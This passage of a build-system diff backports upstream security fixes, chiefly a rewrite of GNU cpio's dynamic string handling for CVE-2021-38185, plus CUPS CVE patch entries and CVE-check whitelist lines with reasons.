161@@ -637,9 +637,9 @@ create_all_directories (char const *name)
162 void
163 prepare_append (int out_file_des)
164 {
165- int start_of_header;
166- int start_of_block;
167- int useful_bytes_in_block;
168+ off_t start_of_header;
169+ off_t start_of_block;
170+ size_t useful_bytes_in_block;
171 char *tmp_buf;
172
173 start_of_header = last_header_start;
174@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2)
175 const struct inode_val *ival1 = val1;
176 const struct inode_val *ival2 = val2;
177 return ival1->inode == ival2->inode
178- && ival1->major_num == ival2->major_num
179- && ival1->minor_num == ival2->minor_num;
180+ && ival1->major_num == ival2->major_num
181+ && ival1->minor_num == ival2->minor_num;
182 }
183
184 static struct inode_val *
185@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num,
186 unsigned long minor_num)
187 {
188 struct inode_val sample;
189-
190+
191 if (!hash_table)
192 return NULL;
193-
194+
195 sample.inode = node_num;
196 sample.major_num = major_num;
197 sample.minor_num = minor_num;
198@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num,
199 {
200 struct inode_val *temp;
201 struct inode_val *e = NULL;
202-
203+
204 /* Create new inode record. */
205 temp = (struct inode_val *) xmalloc (sizeof (struct inode_val));
206 temp->inode = node_num;
207@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize)
208
209 /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to
210 create holes instead of writing blockfuls of zeros.
211-
212+
213 Return the number of bytes written (including bytes in zero
214 regions) on success, -1 on error.
215
216@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
217
218 enum { begin, in_zeros, not_in_zeros } state =
219 delayed_seek_count ? in_zeros : begin;
220-
221+
222 while (nbytes)
223 {
224 size_t rest = nbytes;
225@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
226 if (state == not_in_zeros)
227 {
228 ssize_t bytes = buf - start_ptr + rest;
229-
230+
231 n = write (fildes, start_ptr, bytes);
232 if (n == -1)
233 return -1;
234@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
235 if (n != 1)
236 return n;
237 delayed_seek_count = 0;
238- }
239-
240+ }
241+
242 return nwritten + seek_count;
243 }
244
245@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header)
246 if (!no_chown_flag)
247 {
248 uid_t uid = CPIO_UID (header->c_uid);
249- gid_t gid = CPIO_GID (header->c_gid);
250+ gid_t gid = CPIO_GID (header->c_gid);
251 if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0)
252 && errno != EPERM)
253 chown_error_details (header->c_name, uid, gid);
254@@ -1239,13 +1239,13 @@ set_file_times (int fd,
255 const char *name, unsigned long atime, unsigned long mtime)
256 {
257 struct timespec ts[2];
258-
259+
260 memset (&ts, 0, sizeof ts);
261
262 ts[0].tv_sec = atime;
263 ts[1].tv_sec = mtime;
264
265- /* Silently ignore EROFS because reading the file won't have upset its
266+ /* Silently ignore EROFS because reading the file won't have upset its
267 timestamp if it's on a read-only filesystem. */
268 if (fdutimens (fd, name, ts) < 0 && errno != EROFS)
269 utime_error (name);
270@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names,
271
272 /* This is a simplified form of delayed set_stat used by GNU tar.
273 With the time, both forms will merge and pass to paxutils
274-
275+
276 List of directories whose statuses we need to extract after we've
277 finished extracting their subsidiary files. If you consider each
278 contiguous subsequence of elements of the form [D]?[^D]*, where [D]
279@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed)
280 {
281 int rc;
282 mode_t mode = file_hdr->c_mode;
283-
284+
285 if (!(file_hdr->c_mode & S_IWUSR))
286 {
287 rc = mkdir (file_hdr->c_name, mode | S_IWUSR);
288@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir)
289 {
290 int res; /* Result of various function calls. */
291 int setstat_delayed = 0;
292-
293+
294 if (to_stdout_option)
295 return 0;
296-
297+
298 /* Strip any trailing `/'s off the filename; tar puts
299 them on. We might as well do it here in case anybody
300 else does too, since they cause strange things to happen. */
301@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf)
302 }
303 return 1;
304 }
305-
306+
307 void
308 cpio_file_stat_init (struct cpio_file_stat *file_hdr)
309 {
310--
3112.39.2
312
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 0000000000..6ceafeee49
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
1GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
2pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
3an out-of-bounds heap write.
4
5CVE: CVE-2021-38185
6Upstream-Status: Backport
7Signed-off-by: Ross Burton <ross.burton@arm.com>
8
9From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
10From: Sergey Poznyakoff <gray@gnu.org>
11Date: Sat, 7 Aug 2021 12:52:21 +0300
12Subject: [PATCH 1/3] Rewrite dynamic string support.
13
14* src/dstring.c (ds_init): Take a single argument.
15(ds_free): New function.
16(ds_resize): Take a single argument. Use x2nrealloc to expand
17the storage.
18(ds_reset,ds_append,ds_concat,ds_endswith): New function.
19(ds_fgetstr): Rewrite. In particular, this fixes integer overflow.
20* src/dstring.h (dynamic_string): Keep both the allocated length
21(ds_size) and index of the next free byte in the string (ds_idx).
22(ds_init,ds_resize): Change signature.
23(ds_len): New macro.
24(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
25* src/copyin.c: Use new ds_ functions.
26* src/copyout.c: Likewise.
27* src/copypass.c: Likewise.
28* src/util.c: Likewise.
29---
30 src/copyin.c | 40 +++++++++++------------
31 src/copyout.c | 16 ++++-----
32 src/copypass.c | 34 +++++++++----------
33 src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++--------------
34 src/dstring.h | 31 +++++++++---------
35 src/util.c | 6 ++--
36 6 files changed, 123 insertions(+), 92 deletions(-)
37
38diff --git a/src/copyin.c b/src/copyin.c
39index b29f348..37e503a 100644
40--- a/src/copyin.c
41+++ b/src/copyin.c
42@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
43 char *str_res; /* Result for string function. */
44 static dynamic_string new_name; /* New file name for rename option. */
45 static int initialized_new_name = false;
46+
47 if (!initialized_new_name)
48- {
49- ds_init (&new_name, 128);
50- initialized_new_name = true;
51- }
52+ {
53+ ds_init (&new_name);
54+ initialized_new_name = true;
55+ }
56
57 if (rename_flag)
58 {
59@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
60 already in `save_patterns' (from the command line) are preserved. */
61
62 static void
63-read_pattern_file ()
64+read_pattern_file (void)
65 {
66- int max_new_patterns;
67- char **new_save_patterns;
68- int new_num_patterns;
69+ char **new_save_patterns = NULL;
70+ size_t max_new_patterns;
71+ size_t new_num_patterns;
72 int i;
73- dynamic_string pattern_name;
74+ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
75 FILE *pattern_fp;
76
77 if (num_patterns < 0)
78 num_patterns = 0;
79- max_new_patterns = 1 + num_patterns;
80- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
81 new_num_patterns = num_patterns;
82- ds_init (&pattern_name, 128);
83+ max_new_patterns = num_patterns;
84+ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
85
86 pattern_fp = fopen (pattern_file_name, "r");
87 if (pattern_fp == NULL)
88 open_fatal (pattern_file_name);
89 while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
90 {
91- if (new_num_patterns >= max_new_patterns)
92- {
93- max_new_patterns += 1;
94- new_save_patterns = (char **)
95- xrealloc ((char *) new_save_patterns,
96- max_new_patterns * sizeof (char *));
97- }
98+ if (new_num_patterns == max_new_patterns)
99+ new_save_patterns = x2nrealloc (new_save_patterns,
100+ &max_new_patterns,
101+ sizeof (new_save_patterns[0]));
102 new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
103 ++new_num_patterns;
104 }
105+
106+ ds_free (&pattern_name);
107+
108 if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
109 close_error (pattern_file_name);
110
111@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
112 in the file system. */
113
114 void
115-process_copy_in ()
116+process_copy_in (void)
117 {
118 char done = false; /* True if trailer reached. */
119 FILE *tty_in = NULL; /* Interactive file for rename option. */
120diff --git a/src/copyout.c b/src/copyout.c
121index 8b0beb6..26e3dda 100644
122--- a/src/copyout.c
123+++ b/src/copyout.c
124@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
125 The format of the header depends on the compatibility (-c) flag. */
126
127 void
128-process_copy_out ()
129+process_copy_out (void)
130 {
131- dynamic_string input_name; /* Name of file read from stdin. */
132+ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
133+ /* Name of file read from stdin. */
134 struct stat file_stat; /* Stat record for file. */
135 struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
136 /* Output header information. */
137@@ -605,7 +606,6 @@ process_copy_out ()
138 char *orig_file_name = NULL;
139
140 /* Initialize the copy out. */
141- ds_init (&input_name, 128);
142 file_hdr.c_magic = 070707;
143
144 /* Check whether the output file might be a tape. */
145@@ -657,14 +657,9 @@ process_copy_out ()
146 {
147 if (file_hdr.c_mode & CP_IFDIR)
148 {
149- int len = strlen (input_name.ds_string);
150 /* Make sure the name ends with a slash */
151- if (input_name.ds_string[len-1] != '/')
152- {
153- ds_resize (&input_name, len + 2);
154- input_name.ds_string[len] = '/';
155- input_name.ds_string[len+1] = 0;
156- }
157+ if (!ds_endswith (&input_name, '/'))
158+ ds_append (&input_name, '/');
159 }
160 }
161
162@@ -875,6 +870,7 @@ process_copy_out ()
163 (unsigned long) blocks), (unsigned long) blocks);
164 }
165 cpio_file_stat_free (&file_hdr);
166+ ds_free (&input_name);
167 }
168
169
170diff --git a/src/copypass.c b/src/copypass.c
171index dc13b5b..62f31c6 100644
172--- a/src/copypass.c
173+++ b/src/copypass.c
174@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
175 If `link_flag', link instead of copying. */
176
177 void
178-process_copy_pass ()
179+process_copy_pass (void)
180 {
181- dynamic_string input_name; /* Name of file from stdin. */
182- dynamic_string output_name; /* Name of new file. */
183+ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
184+ /* Name of file from stdin. */
185+ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
186+ /* Name of new file. */
187 size_t dirname_len; /* Length of `directory_name'. */
188 int res; /* Result of functions. */
189 char *slash; /* For moving past slashes in input name. */
190@@ -65,25 +67,18 @@ process_copy_pass ()
191 created files */
192
193 /* Initialize the copy pass. */
194- ds_init (&input_name, 128);
195
196 dirname_len = strlen (directory_name);
197 if (change_directory_option && !ISSLASH (directory_name[0]))
198 {
199 char *pwd = xgetcwd ();
200-
201- dirname_len += strlen (pwd) + 1;
202- ds_init (&output_name, dirname_len + 2);
203- strcpy (output_name.ds_string, pwd);
204- strcat (output_name.ds_string, "/");
205- strcat (output_name.ds_string, directory_name);
206+
207+ ds_concat (&output_name, pwd);
208+ ds_append (&output_name, '/');
209 }
210- else
211- {
212- ds_init (&output_name, dirname_len + 2);
213- strcpy (output_name.ds_string, directory_name);
214- }
215- output_name.ds_string[dirname_len] = '/';
216+ ds_concat (&output_name, directory_name);
217+ ds_append (&output_name, '/');
218+ dirname_len = ds_len (&output_name);
219 output_is_seekable = true;
220
221 change_dir ();
222@@ -116,8 +111,8 @@ process_copy_pass ()
223 /* Make the name of the new file. */
224 for (slash = input_name.ds_string; *slash == '/'; ++slash)
225 ;
226- ds_resize (&output_name, dirname_len + strlen (slash) + 2);
227- strcpy (output_name.ds_string + dirname_len + 1, slash);
228+ ds_reset (&output_name, dirname_len);
229+ ds_concat (&output_name, slash);
230
231 existing_dir = false;
232 if (lstat (output_name.ds_string, &out_file_stat) == 0)
233@@ -333,6 +328,9 @@ process_copy_pass ()
234 (unsigned long) blocks),
235 (unsigned long) blocks);
236 }
237+
238+ ds_free (&input_name);
239+ ds_free (&output_name);
240 }
241
242 /* Try and create a hard link from FILE_NAME to another file
243diff --git a/src/dstring.c b/src/dstring.c
244index e9c063f..358f356 100644
245--- a/src/dstring.c
246+++ b/src/dstring.c
247@@ -20,8 +20,8 @@
248 #if defined(HAVE_CONFIG_H)
249 # include <config.h>
250 #endif
251-
252 #include <stdio.h>
253+#include <stdlib.h>
254 #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
255 #include <string.h>
256 #else
257@@ -33,24 +33,41 @@
258 /* Initialiaze dynamic string STRING with space for SIZE characters. */
259
260 void
261-ds_init (dynamic_string *string, int size)
262+ds_init (dynamic_string *string)
263+{
264+ memset (string, 0, sizeof *string);
265+}
266+
267+/* Free the dynamic string storage. */
268+
269+void
270+ds_free (dynamic_string *string)
271 {
272- string->ds_length = size;
273- string->ds_string = (char *) xmalloc (size);
274+ free (string->ds_string);
275 }
276
277-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */
278+/* Expand dynamic string STRING, if necessary. */
279
280 void
281-ds_resize (dynamic_string *string, int size)
282+ds_resize (dynamic_string *string)
283 {
284- if (size > string->ds_length)
285+ if (string->ds_idx == string->ds_size)
286 {
287- string->ds_length = size;
288- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
289+ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
290+ 1);
291 }
292 }
293
294+/* Reset the index of the dynamic string S to LEN. */
295+
296+void
297+ds_reset (dynamic_string *s, size_t len)
298+{
299+ while (len > s->ds_size)
300+ ds_resize (s);
301+ s->ds_idx = len;
302+}
303+
304 /* Dynamic string S gets a string terminated by the EOS character
305 (which is removed) from file F. S will increase
306 in size during the function if the string from F is longer than
307@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
308 char *
309 ds_fgetstr (FILE *f, dynamic_string *s, char eos)
310 {
311- int insize; /* Amount needed for line. */
312- int strsize; /* Amount allocated for S. */
313 int next_ch;
314
315 /* Initialize. */
316- insize = 0;
317- strsize = s->ds_length;
318+ s->ds_idx = 0;
319
320 /* Read the input string. */
321- next_ch = getc (f);
322- while (next_ch != eos && next_ch != EOF)
323+ while ((next_ch = getc (f)) != eos && next_ch != EOF)
324 {
325- if (insize >= strsize - 1)
326- {
327- ds_resize (s, strsize * 2 + 2);
328- strsize = s->ds_length;
329- }
330- s->ds_string[insize++] = next_ch;
331- next_ch = getc (f);
332+ ds_resize (s);
333+ s->ds_string[s->ds_idx++] = next_ch;
334 }
335- s->ds_string[insize++] = '\0';
336+ ds_resize (s);
337+ s->ds_string[s->ds_idx] = '\0';
338
339- if (insize == 1 && next_ch == EOF)
340+ if (s->ds_idx == 0 && next_ch == EOF)
341 return NULL;
342 else
343 return s->ds_string;
344 }
345
346+void
347+ds_append (dynamic_string *s, int c)
348+{
349+ ds_resize (s);
350+ s->ds_string[s->ds_idx] = c;
351+ if (c)
352+ {
353+ s->ds_idx++;
354+ ds_resize (s);
355+ s->ds_string[s->ds_idx] = 0;
356+ }
357+}
358+
359+void
360+ds_concat (dynamic_string *s, char const *str)
361+{
362+ size_t len = strlen (str);
363+ while (len + 1 > s->ds_size)
364+ ds_resize (s);
365+ memcpy (s->ds_string + s->ds_idx, str, len);
366+ s->ds_idx += len;
367+ s->ds_string[s->ds_idx] = 0;
368+}
369+
370 char *
371 ds_fgets (FILE *f, dynamic_string *s)
372 {
373@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
374 {
375 return ds_fgetstr (f, s, '\0');
376 }
377+
378+/* Return true if the dynamic string S ends with character C. */
379+int
380+ds_endswith (dynamic_string *s, int c)
381+{
382+ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
383+}
384diff --git a/src/dstring.h b/src/dstring.h
385index b5135fe..f5b04ef 100644
386--- a/src/dstring.h
387+++ b/src/dstring.h
388@@ -17,10 +17,6 @@
389 Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
390 Boston, MA 02110-1301 USA. */
391
392-#ifndef NULL
393-#define NULL 0
394-#endif
395-
396 /* A dynamic string consists of record that records the size of an
397 allocated string and the pointer to that string. The actual string
398 is a normal zero byte terminated string that can be used with the
399@@ -30,22 +26,25 @@
400
401 typedef struct
402 {
403- int ds_length; /* Actual amount of storage allocated. */
404- char *ds_string; /* String. */
405+ size_t ds_size; /* Actual amount of storage allocated. */
406+ size_t ds_idx; /* Index of the next free byte in the string. */
407+ char *ds_string; /* String storage. */
408 } dynamic_string;
409
410+#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
411
412-/* Macros that look similar to the original string functions.
413- WARNING: These macros work only on pointers to dynamic string records.
414- If used with a real record, an "&" must be used to get the pointer. */
415-#define ds_strlen(s) strlen ((s)->ds_string)
416-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string)
417-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n)
418-#define ds_index(s, c) index ((s)->ds_string, c)
419-#define ds_rindex(s, c) rindex ((s)->ds_string, c)
420+void ds_init (dynamic_string *string);
421+void ds_free (dynamic_string *string);
422+void ds_reset (dynamic_string *s, size_t len);
423
424-void ds_init (dynamic_string *string, int size);
425-void ds_resize (dynamic_string *string, int size);
426+/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
427 char *ds_fgetname (FILE *f, dynamic_string *s);
428 char *ds_fgets (FILE *f, dynamic_string *s);
429 char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
430+void ds_append (dynamic_string *s, int c);
431+void ds_concat (dynamic_string *s, char const *str);
432+
433+#define ds_len(s) ((s)->ds_idx)
434+
435+int ds_endswith (dynamic_string *s, int c);
436+
437diff --git a/src/util.c b/src/util.c
438index 4421b20..6d6bbaa 100644
439--- a/src/util.c
440+++ b/src/util.c
441@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
442 FILE *tty_out; /* File for interacting with user. */
443 int old_tape_des;
444 char *next_archive_name;
445- dynamic_string new_name;
446+ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
447 char *str_res;
448
449- ds_init (&new_name, 128);
450-
451 /* Open files for interactive communication. */
452 tty_in = fopen (TTY_NAME, "r");
453 if (tty_in == NULL)
454@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
455 error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
456 old_tape_des, tape_des);
457
458- free (new_name.ds_string);
459+ ds_free (&new_name);
460 fclose (tty_in);
461 fclose (tty_out);
462 }
463--
4642.25.1
465
466
467From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
468From: Sergey Poznyakoff <gray@gnu.org>
469Date: Wed, 11 Aug 2021 18:10:38 +0300
470Subject: [PATCH 2/3] Fix previous commit
471
472* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
473loop.
474---
475 src/dstring.c | 4 ++--
476 1 file changed, 2 insertions(+), 2 deletions(-)
477
478diff --git a/src/dstring.c b/src/dstring.c
479index 358f356..90c691c 100644
480--- a/src/dstring.c
481+++ b/src/dstring.c
482@@ -64,7 +64,7 @@ void
483 ds_reset (dynamic_string *s, size_t len)
484 {
485 while (len > s->ds_size)
486- ds_resize (s);
487+ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
488 s->ds_idx = len;
489 }
490
491@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
492 {
493 size_t len = strlen (str);
494 while (len + 1 > s->ds_size)
495- ds_resize (s);
496+ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
497 memcpy (s->ds_string + s->ds_idx, str, len);
498 s->ds_idx += len;
499 s->ds_string[s->ds_idx] = 0;
500--
5012.25.1
502
503
504From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
505From: Sergey Poznyakoff <gray@gnu.org>
506Date: Wed, 18 Aug 2021 09:41:39 +0300
507Subject: [PATCH 3/3] Fix dynamic string reallocations
508
509* src/dstring.c (ds_resize): Take additional argument: number of
510bytes to leave available after ds_idx. All uses changed.
511---
512 src/dstring.c | 18 ++++++++----------
513 1 file changed, 8 insertions(+), 10 deletions(-)
514
515diff --git a/src/dstring.c b/src/dstring.c
516index 90c691c..0f597cc 100644
517--- a/src/dstring.c
518+++ b/src/dstring.c
519@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
520 /* Expand dynamic string STRING, if necessary. */
521
522 void
523-ds_resize (dynamic_string *string)
524+ds_resize (dynamic_string *string, size_t len)
525 {
526- if (string->ds_idx == string->ds_size)
527+ while (len + string->ds_idx >= string->ds_size)
528 {
529 string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
530 1);
531@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
532 void
533 ds_reset (dynamic_string *s, size_t len)
534 {
535- while (len > s->ds_size)
536- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
537+ ds_resize (s, len);
538 s->ds_idx = len;
539 }
540
541@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
542 /* Read the input string. */
543 while ((next_ch = getc (f)) != eos && next_ch != EOF)
544 {
545- ds_resize (s);
546+ ds_resize (s, 0);
547 s->ds_string[s->ds_idx++] = next_ch;
548 }
549- ds_resize (s);
550+ ds_resize (s, 0);
551 s->ds_string[s->ds_idx] = '\0';
552
553 if (s->ds_idx == 0 && next_ch == EOF)
554@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
555 void
556 ds_append (dynamic_string *s, int c)
557 {
558- ds_resize (s);
559+ ds_resize (s, 0);
560 s->ds_string[s->ds_idx] = c;
561 if (c)
562 {
563 s->ds_idx++;
564- ds_resize (s);
565+ ds_resize (s, 0);
566 s->ds_string[s->ds_idx] = 0;
567 }
568 }
569@@ -115,8 +114,7 @@ void
570 ds_concat (dynamic_string *s, char const *str)
571 {
572 size_t len = strlen (str);
573- while (len + 1 > s->ds_size)
574- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
575+ ds_resize (s, len);
576 memcpy (s->ds_string + s->ds_idx, str, len);
577 s->ds_idx += len;
578 s->ds_string[s->ds_idx] = 0;
579--
5802.25.1
581
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index 9e35a80f8b..5ab567f360 100644
--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
9SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ 9SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
10 file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ 10 file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
11 file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ 11 file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
12 file://CVE-2021-38185.patch \
13 file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \
14 file://0004-Fix-appending-to-archives-bigger-than-2G.patch \
12 " 15 "
13 16
14SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" 17SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8
16 19
17inherit autotools gettext texinfo 20inherit autotools gettext texinfo
18 21
22# Issue applies to use of cpio in SUSE/OBS, doesn't apply to us
23CVE_CHECK_WHITELIST += "CVE-2010-4226"
24
19EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}" 25EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}"
20 26
21do_install () { 27do_install () {
diff --git a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
index 82995219dc..9cdb71f1a1 100644
--- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
+++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Password strength checker library" 1SUMMARY = "Password strength checker library"
2HOMEPAGE = "http://sourceforge.net/projects/cracklib" 2HOMEPAGE = "https://github.com/cracklib/cracklib"
3DESCRIPTION = "${SUMMARY}"
3 4
4LICENSE = "LGPLv2.1+" 5LICENSE = "LGPLv2.1+"
5LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06" 6LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06"
diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc
index f6d54c7cf2..6cfe314f20 100644
--- a/meta/recipes-extended/cups/cups.inc
+++ b/meta/recipes-extended/cups/cups.inc
@@ -13,6 +13,11 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t
13 file://0002-don-t-try-to-run-generated-binaries.patch \ 13 file://0002-don-t-try-to-run-generated-binaries.patch \
14 file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \ 14 file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \
15 file://0004-cups-fix-multilib-install-file-conflicts.patch\ 15 file://0004-cups-fix-multilib-install-file-conflicts.patch\
16 file://CVE-2022-26691.patch \
17 file://CVE-2023-32324.patch \
18 file://CVE-2023-34241.patch \
19 file://CVE-2023-32360.patch \
20 file://CVE-2023-4504.patch \
16 " 21 "
17 22
18UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases" 23UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases"
@@ -41,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi',
41PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" 46PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi"
42PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" 47PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl"
43PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" 48PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam"
44PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" 49PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd"
45PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" 50PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd"
46 51
47EXTRA_OECONF = " \ 52EXTRA_OECONF = " \
@@ -52,6 +57,9 @@ EXTRA_OECONF = " \
52 --enable-debug \ 57 --enable-debug \
53 --disable-relro \ 58 --disable-relro \
54 --enable-libusb \ 59 --enable-libusb \
60 --with-system-groups=lpadmin \
61 --with-cups-group=lp \
62 --with-domainsocket=/run/cups/cups.sock \
55 DSOFLAGS='${LDFLAGS}' \ 63 DSOFLAGS='${LDFLAGS}' \
56 " 64 "
57 65
@@ -113,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess"
113cups_sysroot_preprocess () { 121cups_sysroot_preprocess () {
114 sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:' 122 sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:'
115} 123}
124
125# -25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is
126# root:root, so this doesn't apply.
127CVE_CHECK_WHITELIST += "CVE-2021-25317"
diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
new file mode 100644
index 0000000000..1fa5a54c70
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch
@@ -0,0 +1,33 @@
1From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001
2From: Zdenek Dohnal <zdohnal@redhat.com>
3Date: Thu, 26 May 2022 06:27:04 +0200
4Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes
5 CVE-2022-26691)
6
7The previous algorithm didn't expect the strings can have a different
8length, so one string can be a substring of the other and such substring
9was reported as equal to the longer string.
10
11CVE: CVE-2022-26691
12Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444]
13Signed-off-by: Steve Sakoman
14
15---
16diff --git a/scheduler/cert.c b/scheduler/cert.c
17index b268bf1b2..9b65b96c9 100644
18--- a/scheduler/cert.c
19+++ b/scheduler/cert.c
